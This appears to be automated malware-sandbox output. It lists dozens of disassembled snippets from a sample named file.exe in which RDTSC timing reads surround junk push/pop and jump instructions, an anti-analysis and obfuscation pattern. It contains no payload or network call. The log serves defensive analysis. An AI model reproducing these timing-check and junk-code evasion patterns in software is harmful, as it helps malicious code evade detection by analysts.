Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F40D second address: 79F444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C5h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FA1CCF9D8C7h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F5B5 second address: 79F5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA1CCCD2146h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1CCCD214Bh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F5D1 second address: 79F5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A93F9 second address: 7A93FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A955C second address: 7A9589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007FA1CCF9D8B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jc 00007FA1CCF9D8C9h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA1CCF9D8C1h 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9589 second address: 7A958F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A981B second address: 7A983D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A983D second address: 7A9841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9841 second address: 7A9845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9845 second address: 7A984E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A984E second address: 7A9884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C1h 0x00000009 jmp 00007FA1CCF9D8C3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FA1CCF9D8B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9884 second address: 7A988C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A988C second address: 7A989D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A989D second address: 7A98A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9A03 second address: 7A9A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9DF0 second address: 7A9DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9DF8 second address: 7A9DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD592 second address: 7AD599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD599 second address: 7AD5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1CCF9D8B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF9B4 second address: 7AF9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF9B8 second address: 7AF9C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1CCF9D8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF9C8 second address: 7AFA1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA1CCCD2157h 0x0000000c pop ecx 0x0000000d jl 00007FA1CCCD214Ch 0x00000013 jbe 00007FA1CCCD2146h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA1CCCD2154h 0x00000020 jmp 00007FA1CCCD2153h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AFA1C second address: 7AFA20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF4EE second address: 7AF503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2150h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF668 second address: 7AF6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FA1CCF9D8BCh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA1CCF9D8C6h 0x00000016 popad 0x00000017 push edi 0x00000018 jno 00007FA1CCF9D8B6h 0x0000001e jmp 00007FA1CCF9D8BDh 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF6AB second address: 7AF6CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1CCCD2148h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD2151h 0x00000011 jp 00007FA1CCCD2146h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2597 second address: 7B25B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B25B6 second address: 7B25C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B25C6 second address: 7B25DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FA1CCF9D8B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d js 00007FA1CCF9D8B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA8C0 second address: 7BA8DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007FA1CCCD2146h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD214Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA8DB second address: 7BA8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAB8D second address: 7BABC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FA1CCCD2154h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA1CCCD2159h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BABC9 second address: 7BABCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BABCD second address: 7BABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C11A3 second address: 7C11A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C11A7 second address: 7C11C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FA1CCCD2154h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BF9F7 second address: 7BF9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFC94 second address: 7BFC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFC9A second address: 7BFC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFC9E second address: 7BFCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFCA4 second address: 7BFCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FA1CCF9D8B6h 0x0000000d jc 00007FA1CCF9D8B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFDF3 second address: 7BFDF9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C00C3 second address: 7C00E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C8h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C039C second address: 7C03A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C03A2 second address: 7C03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA1CCF9D8B6h 0x0000000a popad 0x0000000b je 00007FA1CCF9D8C7h 0x00000011 jmp 00007FA1CCF9D8BFh 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C03C4 second address: 7C03EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007FA1CCCD2159h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0E27 second address: 7C0E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnc 00007FA1CCF9D8B6h 0x00000011 jmp 00007FA1CCF9D8C3h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jo 00007FA1CCF9D8B6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C9A22 second address: 7C9A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7A0E second address: 7C7A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7FF6 second address: 7C8018 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1CCCD214Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FA1CCCD2152h 0x00000012 jp 00007FA1CCCD2146h 0x00000018 ja 00007FA1CCCD2146h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C82CD second address: 7C82F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C82F0 second address: 7C830D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA1CCCD214Dh 0x0000000f jng 00007FA1CCCD2146h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C830D second address: 7C8324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FA1CCF9D8BDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C8324 second address: 7C8336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C8EF1 second address: 7C8EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C9711 second address: 7C9716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C9716 second address: 7C972F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA1CCF9D8BEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C972F second address: 7C9736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE1FA second address: 7CE1FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE1FE second address: 7CE204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE204 second address: 7CE20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE622 second address: 7CE629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CEB84 second address: 7CEBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C4h 0x00000008 jmp 00007FA1CCF9D8BCh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f je 00007FA1CCF9D8B6h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB99B second address: 7DB9D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1CCCD215Bh 0x00000008 jmp 00007FA1CCCD2155h 0x0000000d push edx 0x0000000e jnc 00007FA1CCCD2146h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b jnp 00007FA1CCCD2146h 0x00000021 pop eax 0x00000022 pushad 0x00000023 js 00007FA1CCCD2146h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F3C second address: 7D9F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0AB second address: 7DA0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FA1CCCD214Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0B8 second address: 7DA0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0D8 second address: 7DA0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0DE second address: 7DA0FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA1CCF9D8C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FA1CCF9D8B6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0FF second address: 7DA11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA11B second address: 7DA123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA253 second address: 7DA262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FA1CCCD2146h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA262 second address: 7DA266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA3C8 second address: 7DA3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA522 second address: 7DA526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA526 second address: 7DA52A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA911 second address: 7DA934 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jmp 00007FA1CCF9D8C3h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9674 second address: 7D968F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA1CCCD214Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2D14 second address: 7E2D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2D18 second address: 7E2D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2D1E second address: 7E2D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA1CCF9D8BBh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2D34 second address: 7E2D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5CD8 second address: 7E5CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1CCF9D8BBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0789 second address: 7F078F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0337 second address: 7F0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1CCF9D8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6264 second address: 7F627D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FA1CCCD214Dh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F627D second address: 7F6284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6284 second address: 7F62A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1CCCD2146h 0x0000000a jmp 00007FA1CCCD2159h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F62A7 second address: 7F62CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FA1CCF9D8BCh 0x00000011 push edi 0x00000012 jne 00007FA1CCF9D8B6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F62CA second address: 7F62CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5BED second address: 7F5BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5BF1 second address: 7F5BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5BF7 second address: 7F5C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FA1CCF9D8B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5C07 second address: 7F5C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
